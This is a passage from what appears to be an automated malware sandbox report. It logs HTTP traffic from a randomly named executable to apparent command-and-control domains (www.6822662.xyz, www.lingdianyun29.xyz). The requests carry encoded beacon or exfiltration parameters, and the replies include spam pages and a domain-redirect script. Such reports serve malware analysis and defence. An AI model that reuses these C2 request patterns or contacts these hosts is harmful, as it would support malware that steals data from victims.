Q+H4oK09nXRDGvpuFl5Yx/f7sb0neRF4OQkwNSu6AojoL6c6FW4d [TRUNCATED]
                                                                        Nov 28, 2024 09:15:44.945220947 CET190INHTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:44 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.550010103.249.106.91802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:45.992675066 CET541OUTGET /dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:48.469150066 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:48 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 34 63 36 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e 26 23 32 30 30 36 31 3b 26 23 33 37 33 32 35 3b 26 23 32 39 36 31 35 3b 26 23 32 32 38 35 36 3b 2d 26 23 32 39 39 39 32 3b 26 23 32 35 31 36 33 3b 26 23 32 36 34 32 36 3b 26 23 32 34 35 39 30 3b 26 23 32 30 30 34 30 3b 26 23 33 30 34 37 35 3b 26 23 32 33 37 30 37 3b 26 23 32 32 32 36 39 3b 26 23 32 32 38 32 33 3b 26 23 32 39 32 35 35 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 36 31 3b 26 23 33 37 33 32 35 3b 26 23 32 39 36 31 35 3b 26 23 32 32 38 35 36 3b 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 36 31 [TRUNCATED]
                                                                        Data Ascii: 4c68<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>&#20061;&#37325;&#29615;&#22856;-&#29992;&#25163;&#26426;&#24590;&#20040;&#30475;&#23707;&#22269;&#22823;&#29255;</title><meta name="keywords" content="&#20061;&#37325;&#29615;&#22856;" /><meta name="description" content="&#20061;&#37325;&#29615;&#22856;" /><link href="http://www.6822662.xyz/template/news/news10/css/layout.css" rel="stylesheet" type="text/css" /></head><body><time draggable="3e4fc5"></time><tt dropzone="8e35db"></tt><var date-time="e2ae3a"></var><div dir="896d1d" id="head_top"><area dir="786058"></area><map lang="4be9df"></map><bdo draggable="19b489"></bdo><div lang="f35039" id="header"><dfn dropzone="27ab1d"></dfn><font date-time="7687fa"></font><ins dir="ad3ba4"></ins><div draggable="1dcd8a" class="b896d1 logo"><a href="http://www.6822662.xyz/"><img dropzone="dd63bd" src="/images/logo/46kkrzujrptjzoxgqchojomi46oixznstpszxppfust6pcmh.png?w=230"></a></a><h1> [TRUNCATED]
                                                                        Nov 28, 2024 09:15:48.469310045 CET1236INData Raw: 61 38 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65 3d 22 63 65 62 36 65 36 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 61 35 64 30 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 61 74 65
                                                                        Data Ascii: a8"></small><sup draggable="ceb6e6"></sup><time dropzone="6a5d00"></time><div date-time="bb3a47" class="cf3503 top_ad"></div></div><tt date-time="f918f3"></tt><var dir="b109f4"></var><area lang="f82d7a"></area><div dir="9f3bfb" class="d1dcd8 c
                                                                        Nov 28, 2024 09:15:48.469324112 CET1236INData Raw: 3c 2f 76 61 72 3e 3c 61 72 65 61 20 64 72 61 67 67 61 62 6c 65 3d 22 66 64 38 37 63 35 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 38 36 33 30 63 35 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 64 61 74 65 2d 74 69 6d 65 3d
                                                                        Data Ascii: </var><area draggable="fd87c5"></area><map dropzone="8630c5"></map><div date-time="4e88c9" id="breadcrumb"><bdo date-time="229925"></bdo><dfn dir="c3c175"></dfn><font lang="14c9f8"></font><div dir="5ea3ce" class="h1180e postbox"><form action="
                                                                        Nov 28, 2024 09:15:48.470067978 CET1236INData Raw: 7a 2f 78 69 64 61 6f 61 69 6c 69 77 2f 27 3e e5 b8 8c e5 b2 9b e7 88 b1 e7 90 86 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 74 69 6d 65 20 64 69 72 3d 22 35 64 39 61 30 61 22 3e 3c 2f 74 69
                                                                        Data Ascii: z/xidaoailiw/'></a></li></ul></div></div></div><time dir="5d9a0a"></time><tt lang="0cde38"></tt><var draggable="1d7ec6"></var><div draggable="8a3bbd" id="container"><area dropzone="eb970d"></area><map date-time="6bcf2c"></map><bdo
                                                                        Nov 28, 2024 09:15:48.470081091 CET896INData Raw: b5 e5 bd b1 3c 2f 61 3e 3c 2f 64 74 3e 3c 64 64 20 73 74 79 6c 65 3d 22 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 7a 6f 6f 6d 3a 31 3b 22 3e 20 e3 80 8a e6 88 98 e7 8b bc 32 e7 94 b5 e5 bd b1 e3 80 8b e6 98 af e7 94 b1 e5 90 b4 e4 ba ac e6 89 a7
                                                                        Data Ascii: </a></dt><dd style="overflow:auto;zoom:1;"> 22017727
                                                                        Nov 28, 2024 09:15:48.470871925 CET1236INData Raw: 9c a8 e5 bd 93 e6 97 b6 e7 9a 84 e9 a6 99 0d 2e 2e 2e 20 3c 2f 64 64 3e 3c 64 64 20 63 6c 61 73 73 3d 22 71 31 64 30 38 66 20 6c 69 6e 66 6f 22 3e 64 61 74 65 3a 3c 73 70 61 6e 3e 32 30 32 34 2d 31 31 2d 32 38 20 31 35 3a 34 32 3c 2f 73 70 61 6e
                                                                        Data Ascii: ... </dd><dd class="q1d08f linfo">date:<span>2024-11-28 15:42</span> praise:<span></span> views:<span>399</span></dd></dl><dl><dt><a href="http://www.6822662.xyz/Dating/736e40598858.html" class="r0b2ef title"><
                                                                        Nov 28, 2024 09:15:48.470894098 CET1236INData Raw: 80 20 70 72 61 69 73 65 3a 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e e3 80 80 20 76 69 65 77 73 3a 3c 73 70 61 6e 3e 32 38 34 36 3c 2f 73 70 61 6e 3e 3c 2f 64 64 3e 3c 2f 64 6c 3e 3c 64 6c 3e 3c 64 74 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f
                                                                        Data Ascii: praise:<span></span> views:<span>2846</span></dd></dl><dl><dt><a href="http://www.6822662.xyz/Dating/830f499165.html" class="v7f84a title"></a></dt><dd style="overflow:auto;zoom:1;">
                                                                        Nov 28, 2024 09:15:48.471735001 CET1236INData Raw: 69 6e 67 2f 31 37 38 62 34 30 35 39 39 34 31 36 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 7a 64 62 65 64 37 20 74 69 74 6c 65 22 3e e6 88 91 e5 92 8c e6 88 91 e7 9a 84 e5 a5 b3 e5 84 bf 3c 2f 61 3e 3c 2f 64 74 3e 3c 64 64 20 73 74 79 6c 65 3d 22
                                                                        Data Ascii: ing/178b40599416.html" class="zdbed7 title"></a></dt><dd style="overflow:auto;zoom:1;">
                                                                        Nov 28, 2024 09:15:48.471751928 CET1236INData Raw: 20 73 74 79 6c 65 3d 22 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 7a 6f 6f 6d 3a 31 3b 22 3e 20 e3 80 8a e6 9c 89 e5 b8 8c e6 9c 9b e7 9a 84 e7 94 b7 e4 ba ba e3 80 8b e6 98 af e4 b8 80 e9 83 a8 e9 9f a9 e5 9b bd e7 94 b5 e8 a7 86 e5 89 a7 ef bc
                                                                        Data Ascii: style="overflow:auto;zoom:1;"> 2014
                                                                        Nov 28, 2024 09:15:48.472459078 CET1236INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 38 32 32 36 36 32 2e 78 79 7a 2f 6a 69 75 7a 68 6f 6e 67 68 75 61 6e 6e 61 69 2f 32 2f 22 3e 32 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36
                                                                        Data Ascii: "http://www.6822662.xyz/jiuzhonghuannai/2/">2</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuannai/3/">3</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuannai/4/">4</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuan
                                                                        Nov 28, 2024 09:15:48.589679003 CET1236INData Raw: 32 38 36 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 64 72 6f 70 7a 6f 6e 65 3d 22 34 65 64 62 36 62 22 3e 3c 2f 62 64 6f 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6b 66 36 30 61 38 20 6c 69 73 74 5f 63 6f 6e 22 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64
                                                                        Data Ascii: 286"></map><bdo dropzone="4edb6b"></bdo><ul class="kf60a8 list_con"></ul></div></div><dfn date-time="abb388"></dfn><font dir="758f1d"></font><ins lang="e3f5d1"></ins><div date-time="dbed76" class="l82efb isidepanel"><h4></h4><small


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.550011121.43.155.35802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:54.352663994 CET811OUTPOST /404o/ HTTP/1.1
                                                                        Host: www.lingdianyun29.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lingdianyun29.xyz
                                                                        Referer: http://www.lingdianyun29.xyz/404o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 56 59 58 65 6a 49 35 69 64 78 78 65 65 74 70 61 57 4f 4e 53 6f 6b 49 67 62 43 39 38 43 35 78 51 63 33 47 46 31 6c 51 33 54 62 75 77 6e 4b 5a 55 34 2b 70 72 6d 42 41 39 58 30 48 41 56 6e 78 57 42 6f 78 7a 41 47 70 51 7a 4d 75 6c 39 35 53 35 62 64 52 54 45 33 44 7a 71 6b 6c 4a 77 70 38 49 36 57 30 4c 77 34 7a 41 73 56 42 46 32 46 35 53 31 37 78 53 4b 45 53 45 58 41 4d 36 30 2f 70 36 47 6b 76 51 6e 61 55 72 50 6e 45 36 46 68 48 2b 78 4a 72 30 33 56 46 42 37 50 6d 4b 70 77 48 45 6e 44 6f 35 30 46 4c 63 44 61 4d 57 6f 34 6b 7a 78 5a 55 4e 55 58 44 43 76 36 41 3d
                                                                        Data Ascii: QhKxhNP=bIpwujxH1mQxVYXejI5idxxeetpaWONSokIgbC98C5xQc3GF1lQ3TbuwnKZU4+prmBA9X0HAVnxWBoxzAGpQzMul95S5bdRTE3DzqklJwp8I6W0Lw4zAsVBF2F5S17xSKESEXAM60/p6GkvQnaUrPnE6FhH+xJr03VFB7PmKpwHEnDo50FLcDaMWo4kzxZUNUXDCv6A=
                                                                        Nov 28, 2024 09:15:55.805223942 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                        Nov 28, 2024 09:15:55.805290937 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                        Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                        Nov 28, 2024 09:15:55.805541992 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                        Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                        Nov 28, 2024 09:15:55.805732012 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                        Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                        Nov 28, 2024 09:15:55.806163073 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                        Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                        Nov 28, 2024 09:15:55.806325912 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                        Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                        Nov 28, 2024 09:15:55.806941986 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                        Nov 28, 2024 09:15:55.807471037 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                        Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                        Nov 28, 2024 09:15:55.807777882 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                        Nov 28, 2024 09:15:55.807991982 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                        Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                        Nov 28, 2024 09:15:55.925668955 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                        Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.550012121.43.155.35802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:57.012895107 CET831OUTPOST /404o/ HTTP/1.1
                                                                        Host: www.lingdianyun29.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lingdianyun29.xyz
                                                                        Referer: http://www.lingdianyun29.xyz/404o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 48 6f 48 65 77 37 52 69 66 52 78 66 62 74 70 61 42 65 4e 65 6f 6b 55 67 62 44 34 6b 44 50 5a 51 53 31 65 46 30 6b 51 33 51 62 75 77 76 71 5a 52 38 2b 70 30 6d 42 63 71 58 30 72 41 56 68 64 57 42 71 35 7a 63 6e 70 66 38 38 75 37 77 5a 53 2f 46 74 52 54 45 33 44 7a 71 6e 5a 6a 77 6f 59 49 36 6d 6b 4c 78 5a 7a 42 7a 6c 42 47 7a 46 35 53 2b 62 78 57 4b 45 53 71 58 43 34 55 30 35 31 36 47 6c 66 51 69 59 38 73 47 6e 46 78 42 68 48 74 6e 4b 65 63 6f 56 4a 34 77 63 44 74 71 79 62 38 69 31 5a 54 75 6e 44 30 51 36 67 75 34 72 73 45 67 70 31 6b 4f 30 54 79 78 74 55 6b 51 78 45 58 4a 31 54 6a 6e 79 2f 37 6e 73 53 67 59 30 6c 78
                                                                        Data Ascii: QhKxhNP=bIpwujxH1mQxHoHew7RifRxfbtpaBeNeokUgbD4kDPZQS1eF0kQ3QbuwvqZR8+p0mBcqX0rAVhdWBq5zcnpf88u7wZS/FtRTE3DzqnZjwoYI6mkLxZzBzlBGzF5S+bxWKESqXC4U0516GlfQiY8sGnFxBhHtnKecoVJ4wcDtqyb8i1ZTunD0Q6gu4rsEgp1kO0TyxtUkQxEXJ1Tjny/7nsSgY0lx
                                                                        Nov 28, 2024 09:15:58.512017012 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                        Nov 28, 2024 09:15:58.512131929 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                        Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
